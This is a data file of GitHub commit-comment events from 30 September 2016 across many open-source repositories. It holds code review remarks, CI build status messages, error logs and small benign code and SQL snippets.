{"id":"4644337166","type":"CommitCommentEvent","actor":{"login":"julsemaan"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":19243482,"position":4,"line":42,"path":"raddb/dictionary.inverse","commit_id":"d1462b5cc00f0fc9835d2d3f3fe098b3d48cba83","created_at":"2016-09-30T16:03:29Z","updated_at":"2016-09-30T16:03:29Z","body":"Authorization"}},"created_at":"2016-09-30T16:03:29Z"}
{"id":"4644337640","type":"CommitCommentEvent","actor":{"login":"julsemaan"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":19243485,"position":8,"line":48,"path":"lib/pf/radius/rest.pm","commit_id":"d1462b5cc00f0fc9835d2d3f3fe098b3d48cba83","created_at":"2016-09-30T16:03:34Z","updated_at":"2016-09-30T16:03:34Z","body":"Authorization"}},"created_at":"2016-09-30T16:03:34Z"}
{"id":"4644340148","type":"CommitCommentEvent","actor":{"login":"julsemaan"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":19243491,"position":11,"line":234,"path":"conf/radiusd/packetfence-tunnel.example","commit_id":"d1462b5cc00f0fc9835d2d3f3fe098b3d48cba83","created_at":"2016-09-30T16:04:01Z","updated_at":"2016-09-30T16:04:01Z","body":"reply:PacketFence-Authorisation-Status ?"}},"created_at":"2016-09-30T16:04:01Z"}
{"id":"4644342174","type":"CommitCommentEvent","actor":{"login":"julsemaan"},"repo":{"name":"inverse-inc/packetfence"},"payload":{"comment":{"id":19243499,"position":11,"line":234,"path":"conf/radiusd/packetfence-tunnel.example","commit_id":"d1462b5cc00f0fc9835d2d3f3fe098b3d48cba83","created_at":"2016-09-30T16:04:23Z","updated_at":"2016-09-30T16:04:23Z","body":"And would need the typo fix of Authorisation->Authorization"}},"created_at":"2016-09-30T16:04:23Z"}
{"id":"4644342819","type":"CommitCommentEvent","actor":{"login":"wdlkmpx"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19243502,"position":null,"line":null,"path":null,"commit_id":"53d1842b2c2c652522a63befb54bf8ee8965a85c","created_at":"2016-09-30T16:04:30Z","updated_at":"2016-09-30T16:04:30Z","body":" /etc/X11/xkb from the xorg_base template seems not suitable, overall i see puppy does unorthodox things, specially with kbd stuff. i guess that's why it's possible to configure keyboard through the lxde apps or something, which are quite powerful and versatile.\r\n\r\nusing other kbd stuff, there is an issue with the up key, i see the key code 111 is mapped to the up key, it's usually mapped to the print screen key. this makes jwm trigger defaultscreenshot when the up key is pressed.. really bad, as explained in #882"}},"created_at":"2016-09-30T16:04:30Z"}
{"id":"4644344526","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243508,"position":null,"line":null,"path":null,"commit_id":"2ac3f5cbb884a5de6df49ea1513c55579d66e5db","created_at":"2016-09-30T16:04:50Z","updated_at":"2016-09-30T16:04:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1235](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14762&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:08:52"}},"created_at":"2016-09-30T16:04:50Z"}
{"id":"4644349421","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243527,"position":11,"line":12,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:05:45Z","updated_at":"2016-09-30T16:05:45Z","body":"Il punto interrogativo alla fine."}},"created_at":"2016-09-30T16:05:45Z"}
{"id":"4644351204","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243543,"position":22,"line":21,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T16:06:07Z","updated_at":"2016-09-30T16:06:07Z","body":"OK"}},"created_at":"2016-09-30T16:06:07Z"}
{"id":"4644352455","type":"CommitCommentEvent","actor":{"login":"biergaizi"},"repo":{"name":"Irqbalance/irqbalance"},"payload":{"comment":{"id":19243547,"position":null,"line":null,"path":null,"commit_id":"699deffdd881bf4759f3fcc4d6ee3e018e4c266e","created_at":"2016-09-30T16:06:21Z","updated_at":"2016-09-30T16:06:21Z","body":"@sriemer Yes, I came up with this patch after irqbalance used all of my Xen RAM."}},"created_at":"2016-09-30T16:06:21Z"}
{"id":"4644352682","type":"CommitCommentEvent","actor":{"login":"Yongyao"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19243549,"position":15,"line":44,"path":"core/src/main/java/esiptestbed/mudrod/ssearch/ranking/Learner.java","commit_id":"178312a22d2a5cfbc191e3817085df6af963430e","created_at":"2016-09-30T16:06:23Z","updated_at":"2016-09-30T16:06:23Z","body":"@lewismc It looks like a local path still. I just tested the new branch by starting the service from eclipse. Still got the same error (please see below). Does this mean we have to store the ranking folder somewhere else rather than resource folder. \r\n\r\n```\r\n2016-09-30 12:01:22,639 ERROR [localhost].[/mudrod-service] (DirectJDKLog.java:log(185)) - Exception sending context initialized event to listener instance of class esiptestbed.mudrod.services.MudrodContextListener\r\njava.io.FileNotFoundException: Added file file:/usr/local/mudrod/core/src/main/resources/javaSVMWithSGDModel does not exist.\r\n\tat org.apache.spark.SparkContext.addFile(SparkContext.scala:1413)\r\n\tat esiptestbed.mudrod.ssearch.ranking.Learner.<init>(Learner.java:45)\r\n\tat esiptestbed.mudrod.ssearch.Ranker.<init>(Ranker.java:50)\r\n\tat esiptestbed.mudrod.services.MudrodContextListener.contextInitialized(MudrodContextListener.java:63)\r\n\tat org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:5077)\r\n```"}},"created_at":"2016-09-30T16:06:23Z"}
{"id":"4644353212","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19243551,"position":null,"line":null,"path":null,"commit_id":"df9c5cc4646043be4d2906d85745258e33b0a523","created_at":"2016-09-30T16:06:29Z","updated_at":"2016-09-30T16:06:29Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.278.df9c5cc4646043be4d2906d85745258e33b0a523](http://build.palaso.org/viewLog.html?buildId=77298&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **UNKNOWN**\nSummary: Canceled (Exit code 1) Build time: 00:14:40"}},"created_at":"2016-09-30T16:06:29Z"}
{"id":"4644356120","type":"CommitCommentEvent","actor":{"login":"atfirstsight0"},"repo":{"name":"atfirstsight0/Darth-Terok-Nor"},"payload":{"comment":{"id":19243564,"position":null,"line":null,"path":null,"commit_id":"afd556eb011a33f9cad7184ddb5d7d23198729fb","created_at":"2016-09-30T16:07:03Z","updated_at":"2016-09-30T16:07:03Z","body":"Testing"}},"created_at":"2016-09-30T16:07:03Z"}
{"id":"4644361289","type":"CommitCommentEvent","actor":{"login":"grawity"},"repo":{"name":"traviscross/mtr"},"payload":{"comment":{"id":19243585,"position":null,"line":null,"path":null,"commit_id":"b90a522f23167bd00062504803e94220937aba23","created_at":"2016-09-30T16:07:57Z","updated_at":"2016-09-30T16:07:57Z","body":"Well, yes, it certainly works as intended – as long as the intended value is `0`."}},"created_at":"2016-09-30T16:07:57Z"}
{"id":"4644367126","type":"CommitCommentEvent","actor":{"login":"sasha240100"},"repo":{"name":"WhitestormJS/whitestorm.js"},"payload":{"comment":{"id":19243603,"position":5,"line":40,"path":"test/unit/core/light.spec.js","commit_id":"e6dbae904bbed0c21cdf809e104a0b28f1e42277","created_at":"2016-09-30T16:09:04Z","updated_at":"2016-09-30T16:09:04Z","body":"@electron0zero That wouldn't work. Use `WHS.Component` to wrap. (for cameras and meshes too)"}},"created_at":"2016-09-30T16:09:04Z"}
{"id":"4644369100","type":"CommitCommentEvent","actor":{"login":"bertfrees"},"repo":{"name":"daisy/pipeline-assembly"},"payload":{"comment":{"id":19243612,"position":null,"line":null,"path":null,"commit_id":"d706242d0e7c330c8f348a1f88927e814a3f6e8f","created_at":"2016-09-30T16:09:26Z","updated_at":"2016-09-30T16:09:26Z","body":"Can we delete the calabash-custom-steps submodule from pipeline-framework?"}},"created_at":"2016-09-30T16:09:26Z"}
{"id":"4644369606","type":"CommitCommentEvent","actor":{"login":"jgoppert"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19243613,"position":null,"line":null,"path":null,"commit_id":"cf8f48486898835dcbb55dcbe8c54a4427349022","created_at":"2016-09-30T16:09:32Z","updated_at":"2016-09-30T16:09:32Z","body":"Jenkins: test this please"}},"created_at":"2016-09-30T16:09:32Z"}
{"id":"4644369820","type":"CommitCommentEvent","actor":{"login":"jgravelle-google"},"repo":{"name":"WebAssembly/binaryen"},"payload":{"comment":{"id":19243616,"position":5,"line":638,"path":"src/passes/Print.cpp","commit_id":"fb60c1ac3e21ee822ff3209d4ac5022fd06c9a34","created_at":"2016-09-30T16:09:35Z","updated_at":"2016-09-30T16:09:35Z","body":"Should this be `continue`?"}},"created_at":"2016-09-30T16:09:35Z"}
{"id":"4644369981","type":"CommitCommentEvent","actor":{"login":"sasha240100"},"repo":{"name":"WhitestormJS/whitestorm.js"},"payload":{"comment":{"id":19243618,"position":5,"line":35,"path":"test/unit/core/camera.spec.js","commit_id":"e6dbae904bbed0c21cdf809e104a0b28f1e42277","created_at":"2016-09-30T16:09:37Z","updated_at":"2016-09-30T16:09:37Z","body":"Same here. Use `WHS.Component`"}},"created_at":"2016-09-30T16:09:37Z"}
{"id":"4644370106","type":"CommitCommentEvent","actor":{"login":"Yongyao"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19243621,"position":24,"line":17,"path":"service/src/main/webapp/WEB-INF/web.xml","commit_id":"178312a22d2a5cfbc191e3817085df6af963430e","created_at":"2016-09-30T16:09:38Z","updated_at":"2016-09-30T16:09:38Z","body":"@lewismc May I ask why you changed it from 3.0 to 2.4. It caused a new error in eclipse, after mvn clean install eclipse:eclipse\r\n\r\n`cvc-complex-type.2.4.a: Invalid content was found starting with element 'listener'. One of '{\"http://java.sun.com/xml/ns/j2ee\":run-as, \"http://java.sun.com/xml/ns/j2ee\":security-role-ref}' is expected.\tweb.xml\t/mudrod-service/src/main/webapp/WEB-INF\tline 39\tXML Problem`\r\n"}},"created_at":"2016-09-30T16:09:38Z"}
{"id":"4644370562","type":"CommitCommentEvent","actor":{"login":"sasha240100"},"repo":{"name":"WhitestormJS/whitestorm.js"},"payload":{"comment":{"id":19243622,"position":5,"line":35,"path":"test/unit/core/camera.spec.js","commit_id":"e6dbae904bbed0c21cdf809e104a0b28f1e42277","created_at":"2016-09-30T16:09:43Z","updated_at":"2016-09-30T16:09:43Z","body":"@electron0zero \r\n"}},"created_at":"2016-09-30T16:09:43Z"}
{"id":"4644372701","type":"CommitCommentEvent","actor":{"login":"thallgren"},"repo":{"name":"Yelp/puppet"},"payload":{"comment":{"id":19243630,"position":82,"line":82,"path":"lib/puppet/pops/lookup/interpolation.rb","commit_id":"087312f99e1e45733bec09f5a61f9fa7f1b70874","created_at":"2016-09-30T16:10:07Z","updated_at":"2016-09-30T16:10:07Z","body":"Yes, that's correct."}},"created_at":"2016-09-30T16:10:07Z"}
{"id":"4644373907","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243635,"position":null,"line":null,"path":null,"commit_id":"66ec62150396c61f12e2fdd13adacdbf902b73cf","created_at":"2016-09-30T16:10:19Z","updated_at":"2016-09-30T16:10:19Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1236](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14766&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:21"}},"created_at":"2016-09-30T16:10:19Z"}
{"id":"4644376456","type":"CommitCommentEvent","actor":{"login":"ZedCee"},"repo":{"name":"ZedCee/various_graphics"},"payload":{"comment":{"id":19243642,"position":null,"line":null,"path":null,"commit_id":"262646528fdd4d1ed4d20600520d50f3eb4df98d","created_at":"2016-09-30T16:10:47Z","updated_at":"2016-09-30T16:10:47Z","body":"We can certainly discuss it.\r\nIt really depends on what it is, for a few reasons:\r\n- I'm presently attending school for basically nothing related\r\n- My computing platforms are fairly decrepit, I borrowed my girlfriends for this one\r\n- These projects, as simple as they are, can become quite time consuming\r\n\r\nAll that being said, it may be a little time before I could get to work on it, if I could.  \r\nI've seen some of the Minecraft art out there and it's intense."}},"created_at":"2016-09-30T16:10:47Z"}
{"id":"4644376510","type":"CommitCommentEvent","actor":{"login":"Kevin-Wei"},"repo":{"name":"dchbx/enroll"},"payload":{"comment":{"id":19243643,"position":4,"line":76,"path":"app/models/hbx_enrollment.rb","commit_id":"46e180718f88df9f6132627e4cc4860e3efe9c50","created_at":"2016-09-30T16:10:47Z","updated_at":"2016-09-30T16:10:47Z","body":"We should spec guard this field in master "}},"created_at":"2016-09-30T16:10:47Z"}
{"id":"4644377290","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243648,"position":null,"line":null,"path":null,"commit_id":"92826b40f1cff83b46ae109a2ff628f920674541","created_at":"2016-09-30T16:10:56Z","updated_at":"2016-09-30T16:10:56Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 30](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33126&buildTypeId=PlatformServices_EnvironmentManager_RunTests) is now running\n"}},"created_at":"2016-09-30T16:10:56Z"}
{"id":"4644378666","type":"CommitCommentEvent","actor":{"login":"christophermancini"},"repo":{"name":"basho/riak-ruby-client"},"payload":{"comment":{"id":19243652,"position":5,"line":18,"path":"spec/integration/riak/encodings/crdt_spec.rb","commit_id":"cbf338816dbda89a773a9ff885dc9ba14a1c66a8","created_at":"2016-09-30T16:11:11Z","updated_at":"2016-09-30T16:11:11Z","body":"Should use the default bucket type defined the lib, crdt.rb I believe."}},"created_at":"2016-09-30T16:11:11Z"}
{"id":"4644380547","type":"CommitCommentEvent","actor":{"login":"captbaritone"},"repo":{"name":"adarsh/blog"},"payload":{"comment":{"id":19243660,"position":null,"line":null,"path":null,"commit_id":"fc5a7d21e2c0c8c6ca27e9fe2aafd786105088e1","created_at":"2016-09-30T16:11:32Z","updated_at":"2016-09-30T16:11:32Z","body":"Looks good to me!"}},"created_at":"2016-09-30T16:11:32Z"}
{"id":"4644381445","type":"CommitCommentEvent","actor":{"login":"GiovanniBussi"},"repo":{"name":"plumed/plumed2"},"payload":{"comment":{"id":19243663,"position":null,"line":null,"path":null,"commit_id":"29b26869ce1677ed487365794f316c4ba9343c44","created_at":"2016-09-30T16:11:41Z","updated_at":"2016-09-30T16:11:41Z","body":"@carlocamilloni \r\nThis commit breaks the plumedcheck control. The reason is that to avoid typos it checks that:\r\n- all the __PLUMED_HAS_XXX things used in the code are also set in configure.ac\r\n- all the __PLUMED_HAS_XXX things set in configure.ac should appear in the code\r\n\r\nThis commit is breaking the first. So, either:\r\n- you add a flag --enable-ompsimd to configure.ac that sets __PLUMED_HAS_OMPSIMD\r\n- you rename the string to __PLUMED_OMPSIMD (strings without HAS are not checked now)\r\n- I remove the check from plumedcheck\r\n\r\nI would like to keep the check since I think it avoids mistakes, but I can do it if you think it is too strict\r\n\r\n@plumed/all "}},"created_at":"2016-09-30T16:11:41Z"}
{"id":"4644384878","type":"CommitCommentEvent","actor":{"login":"c0r3dmpr"},"repo":{"name":"rsyslog/rsyslog"},"payload":{"comment":{"id":19243676,"position":5,"line":1640,"path":"tools/rsyslogd.c","commit_id":"69e1be41ac23b429d841f6b7de49c0de03e108e3","created_at":"2016-09-30T16:12:18Z","updated_at":"2016-09-30T16:12:18Z","body":"Hi @rgerhards, for some reason this function is not included in latest json-c release 0.12.1-20160607, thus it leads to building failure with message \"error: implicit declaration of function 'json_global_set_string_hash'\"."}},"created_at":"2016-09-30T16:12:18Z"}
{"id":"4644386203","type":"CommitCommentEvent","actor":{"login":"lukebakken"},"repo":{"name":"basho/riak-ruby-client"},"payload":{"comment":{"id":19243685,"position":5,"line":18,"path":"spec/integration/riak/encodings/crdt_spec.rb","commit_id":"cbf338816dbda89a773a9ff885dc9ba14a1c66a8","created_at":"2016-09-30T16:12:32Z","updated_at":"2016-09-30T16:12:32Z","body":"Not sure what you mean here?"}},"created_at":"2016-09-30T16:12:32Z"}
{"id":"4644386523","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-docs"},"payload":{"comment":{"id":19243686,"position":null,"line":null,"path":null,"commit_id":"60d3f395462c48383f80a9a2b36631d601d1656f","created_at":"2016-09-30T16:12:35Z","updated_at":"2016-09-30T16:12:35Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ZI7Zg2TkS8e3gzkjwb6t_g"}},"created_at":"2016-09-30T16:12:35Z"}
{"id":"4644387081","type":"CommitCommentEvent","actor":{"login":"ghostbar"},"repo":{"name":"ghostbar/angular-zxcvbn"},"payload":{"comment":{"id":19243690,"position":null,"line":null,"path":null,"commit_id":"c8c9edd1d5308a03145aae07f49dcd26bd32b60e","created_at":"2016-09-30T16:12:41Z","updated_at":"2016-09-30T16:12:41Z","body":" 89074bb"}},"created_at":"2016-09-30T16:12:41Z"}
{"id":"4644388634","type":"CommitCommentEvent","actor":{"login":"hfroeb"},"repo":{"name":"hfroeb/Crud"},"payload":{"comment":{"id":19243697,"position":null,"line":null,"path":null,"commit_id":"c79696260a9137af46ee730599f5895ab63aafd7","created_at":"2016-09-30T16:12:58Z","updated_at":"2016-09-30T16:12:58Z","body":"when editing event, first commit code logged out current user, fixed in second commit"}},"created_at":"2016-09-30T16:12:58Z"}
{"id":"4644389795","type":"CommitCommentEvent","actor":{"login":"ViolyS"},"repo":{"name":"ViolyS/RayUI_VS"},"payload":{"comment":{"id":19243701,"position":null,"line":null,"path":null,"commit_id":"5996c7a1f60eda64f8de53f44c20fdadd7a9c818","created_at":"2016-09-30T16:13:11Z","updated_at":"2016-09-30T16:13:11Z","body":"目前先这样看看，如果确实需要，我再改回来。"}},"created_at":"2016-09-30T16:13:11Z"}
{"id":"4644391223","type":"CommitCommentEvent","actor":{"login":"Klyson"},"repo":{"name":"Klyson/4UI-"},"payload":{"comment":{"id":19243708,"position":null,"line":null,"path":null,"commit_id":"a30fc53c228fbcbd14568a60a72a1cc3d9944739","created_at":"2016-09-30T16:13:27Z","updated_at":"2016-09-30T16:13:27Z","body":"package gdx1;\r\n\r\nimport com.badlogic.gdx.ApplicationAdapter;\r\nimport com.badlogic.gdx.Gdx;\r\nimport com.badlogic.gdx.graphics.GL20;\r\nimport com.badlogic.gdx.graphics.Texture;\r\nimport com.badlogic.gdx.graphics.g2d.Sprite;\r\nimport com.badlogic.gdx.graphics.g2d.SpriteBatch;\r\n\r\npublic class Gdx1 extends ApplicationAdapter {\r\n\tSpriteBatch asd;\r\n\tTexture img;\r\n        Sprite sprite;\r\n\t\r\n\t@Override\r\n\tpublic void create () {\r\n\t\tasd = new SpriteBatch();\r\n\t\timg = new Texture(\"CoreSprite.png\");\r\n                sprite = new Sprite(img);\r\n                sprite.setPosition(Gdx.graphics.getWidth()/2, Gdx.graphics.getHeight()/2);\r\n                //sprite.scale(2f);\r\n               }\r\n\r\n\t@Override\r\n\tpublic void render () {\r\n\t\tGdx.gl.glClearColor(0, 0, 0, 0);\r\n\t\tGdx.gl.glClear(GL20.GL_COLOR_BUFFER_BIT);\r\n\t\tasd.begin();\r\n\t\tasd.draw(img, sprite.getX(), sprite.getY(), Gdx.graphics.getWidth()/5 , Gdx.graphics.getHeight()/5);\r\n\t\tasd.end();\r\n\t}\r\n}\r\n"}},"created_at":"2016-09-30T16:13:27Z"}
{"id":"4644394035","type":"CommitCommentEvent","actor":{"login":"sasha240100"},"repo":{"name":"WhitestormJS/whitestorm.js"},"payload":{"comment":{"id":19243721,"position":5,"line":35,"path":"test/unit/core/camera.spec.js","commit_id":"e6dbae904bbed0c21cdf809e104a0b28f1e42277","created_at":"2016-09-30T16:13:58Z","updated_at":"2016-09-30T16:13:58Z","body":"@electron0zero I think it should be wrapped as \r\n```javascript\r\nCameraComponent(new WHS.Component(new THREE.Camera()))\r\n```"}},"created_at":"2016-09-30T16:13:58Z"}
{"id":"4644394912","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"bgrainger/MySqlConnector"},"payload":{"comment":{"id":19243725,"position":null,"line":null,"path":null,"commit_id":"09b45fce026fdc77db94ab9262de10f414ed85a0","created_at":"2016-09-30T16:14:07Z","updated_at":"2016-09-30T16:14:07Z","body":"> We'd need to check if Core CLR actually supports connecting to a hostname now before switching back.\r\n\r\nGood point, it is not supported on Linux unless we switched to the static ConnectAsync method.  Let's leave it the way it is.\r\n\r\n`Unhandled Exception: System.PlatformNotSupportedException: This platform does not support connecting sockets to DNS endpoints via the instance Connect and ConnectAsync methods, due to the potential for a host name to map to multiple IP addresses and sockets becoming invalid for use after a failed connect attempt. Use the static ConnectAsync method, or provide to the instance methods the specific IPAddress desired.`\r\n\r\n> But even if it does, the synchronous Connect call on Linux wasn't being cancelled (even though that code works fine under CoreCLR on Windows). This breaks the connect timeout, so it can't be used.\r\n\r\nHere's what I'm seeing with `await socket.ConnectAsync(ipAddress, port)` from the Synchronous stress test (running on this commit, connection pool size = 100)\r\n\r\n1. I run 10K sync requests at once `./stress.sh 10000 1s sync`\r\n2.  Only 2 connections get opened before the thread pool is starved and `ConnectAsync` functions stop completing\r\n3. 9,902 requests complete successfully\r\n4. The other 98 requests that were waiting in `ConnectAsync` timeout\r\n\r\nI'll try to look for another way to do this on Linux synchronously but still timeout.  If there's not another way, I think linux may have a default TCP Open timeout limit that the driver will have to fall back on"}},"created_at":"2016-09-30T16:14:07Z"}
{"id":"4644395777","type":"CommitCommentEvent","actor":{"login":"diamondo25"},"repo":{"name":"Maxcloud/Mushy"},"payload":{"comment":{"id":19243730,"position":40,"line":78,"path":"src/server/Start.java","commit_id":"689947f1c2a26e0a0141dcf327c3f446fad56dbb","created_at":"2016-09-30T16:14:17Z","updated_at":"2016-09-30T16:14:17Z","body":"Wouldn't it be cool to make this configurable?"}},"created_at":"2016-09-30T16:14:17Z"}
{"id":"4644398535","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19243742,"position":null,"line":null,"path":null,"commit_id":"e2852052acb54bc8a6b52251efde18c4fc9223f3","created_at":"2016-09-30T16:14:50Z","updated_at":"2016-09-30T16:14:50Z","body":"@Keital  \r\n\r\nIn file included from /home/travis/build/JadeEmu/JadeCore_547/src/server/collision/Management/MMapFactory.h:22:0,\r\n                 from /home/travis/build/JadeEmu/JadeCore_547/src/server/collision/Management/MMapFactory.cpp:19:\r\n/home/travis/build/JadeEmu/JadeCore_547/src/server/collision/Management/MMapManager.h:23:25: fatal error: DetourAlloc.h: No such file or directory\r\n #include \"DetourAlloc.h\""}},"created_at":"2016-09-30T16:14:50Z"}
{"id":"4644399137","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243746,"position":null,"line":null,"path":null,"commit_id":"f08f2a9bb3de6ef974dce96756f7fd74e23a0297","created_at":"2016-09-30T16:14:57Z","updated_at":"2016-09-30T16:14:57Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 31](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33127&buildTypeId=PlatformServices_EnvironmentManager_RunTests) is now running\n"}},"created_at":"2016-09-30T16:14:57Z"}
{"id":"4644399198","type":"CommitCommentEvent","actor":{"login":"matthewwall"},"repo":{"name":"weewx/weewx"},"payload":{"comment":{"id":19243749,"position":null,"line":null,"path":null,"commit_id":"d126625b8e4a5da9691d822e43e18734635893f9","created_at":"2016-09-30T16:14:58Z","updated_at":"2016-09-30T16:14:58Z","body":"i thought the 2em added too much whitespace.  the margin-top of 0 for the title class fixed the title problem caused by the 2em in h2.  i'll add some top whitespace to h2, but i would prefer to do a complete makeover - the microsoft styles from which this started are not very nice."}},"created_at":"2016-09-30T16:14:58Z"}
{"id":"4644404041","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":19243782,"position":null,"line":null,"path":null,"commit_id":"26c200c32c1b57fc87176245e92a9a519d2352a5","created_at":"2016-09-30T16:15:48Z","updated_at":"2016-09-30T16:15:48Z","body":"```mysql\r\nSELECT `ecms_equipment_table`.`id`, `ecms_equipment_table`.`model`, `ecms_equipment_table`.`asset_number`, `ecms_equipment_table`.`location_id`, `ecms_attrs_table`.`id` AS `ecms_attrs_table.id`, `ecms_attrs_table`.`last_cal` AS `ecms_attrs_table.last_cal`, `ecms_attrs_table`.\r\n`schedule` AS `ecms_attrs_table.schedule`, `ecms_attrs_table`.`next_cal` AS `ecms_attrs_table.next_cal`, `ecms_location_table`.`id` AS `ecms_location_table.id`, `ecms_location_table`.`desc` AS `ecms_location_table.desc` FROM `ecms_equipment_table` AS `ecms_equipment_table` LEFT JOIN `ECMS_attrs_table` AS `ecms_attrs_table` ON `ecms_equipment_table`.`id` = `ecms_attrs_table`.`asset_number` LEFT JOIN `ecms_location_table` AS `ecms_location_table` ON `ecms_equipment_table`.`location_id` = `ecms_location_table`.`id`;\r\n```"}},"created_at":"2016-09-30T16:15:48Z"}
{"id":"4644404276","type":"CommitCommentEvent","actor":{"login":"fbbdev"},"repo":{"name":"binki/autoserve"},"payload":{"comment":{"id":19243784,"position":12,"line":17,"path":"index.js","commit_id":"cbccaf2ac55fa172c59891a9648dd45ab1ec1ded","created_at":"2016-09-30T16:15:50Z","updated_at":"2016-09-30T16:15:50Z","body":"Ok, maybe it's better if I tell you about my problem. I should have done this first. I have a website on a shared hosting provider where only cgi or fastcgi are available, but I can install and run any binary, so I installed the node interpreter and created node-fastcgi to host the apps I already had as fastcgi services.\r\n\r\nHowever, I didn't want to expose FastCGI scripts (and horrible URLs) to the world, so I set up a rewrite to redirect internally, for example, `/chat/*` to `/cgi-bin/chat/app.fcgi`. This means (on my Apache hosting) that if I request, say, `/chat/room1`, the following parameters will be passed to the CGI:\r\n  * **REQUEST_URI:** `/chat/room1`\r\n  * **PATH_INFO:** empty\r\n  * **SCRIPT_NAME:** `/cgi-bin/chat/app.fcgi`\r\n\r\nI had to modify the main app script and slice out by hand the base (`/chat`) from the url. In this case and similar ones, a generic mechanism to find and advertise the base url would do good, but the mechanism currently implemented by autoserve would fail because `SCRIPT_NAME` is not the base url. Moreover, by setting `req.baseUrl` by default, I'd have to manually hide that from express to avoid breaking the application.\r\n\r\nThe problem is that the base url depends heavily on the deployment environment. Some platforms have well-defined ways to retrieve it, some others do not. The platforms could provide a default, but an override mechanism is needed, and it should not force the user to override the platform definition. Maybe we should move the discussion to an issue."}},"created_at":"2016-09-30T16:15:50Z"}
{"id":"4644405906","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243792,"position":null,"line":null,"path":null,"commit_id":"92826b40f1cff83b46ae109a2ff628f920674541","created_at":"2016-09-30T16:16:10Z","updated_at":"2016-09-30T16:16:10Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 30](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33126&buildTypeId=PlatformServices_EnvironmentManager_RunTests) outcome was **SUCCESS**\nSummary: Tests passed: 421 Build time: 00:05:14"}},"created_at":"2016-09-30T16:16:10Z"}
{"id":"4644406568","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19243797,"position":null,"line":null,"path":null,"commit_id":"7b74bcd2ded955b77a990488045266cc930abe2b","created_at":"2016-09-30T16:16:19Z","updated_at":"2016-09-30T16:16:19Z","body":"Looks good. Please push it to `rr/` branch, so it would run on teamcity."}},"created_at":"2016-09-30T16:16:19Z"}
{"id":"4644408119","type":"CommitCommentEvent","actor":{"login":"trainline-em-bot"},"repo":{"name":"trainline/environment-manager"},"payload":{"comment":{"id":19243800,"position":null,"line":null,"path":null,"commit_id":"f08f2a9bb3de6ef974dce96756f7fd74e23a0297","created_at":"2016-09-30T16:16:38Z","updated_at":"2016-09-30T16:16:38Z","body":"TeamCity Platform Services :: Environment Manager :: Run Tests [Build 32](http://infra.teamcity.ci.ttldev/viewLog.html?buildId=33128&buildTypeId=PlatformServices_EnvironmentManager_RunTests) is now running\n"}},"created_at":"2016-09-30T16:16:38Z"}
{"id":"4644408593","type":"CommitCommentEvent","actor":{"login":"Keital"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19243803,"position":null,"line":null,"path":null,"commit_id":"e2852052acb54bc8a6b52251efde18c4fc9223f3","created_at":"2016-09-30T16:16:43Z","updated_at":"2016-09-30T16:16:43Z","body":"@Bodeguero yes, im reverting all and then i will check at home"}},"created_at":"2016-09-30T16:16:43Z"}
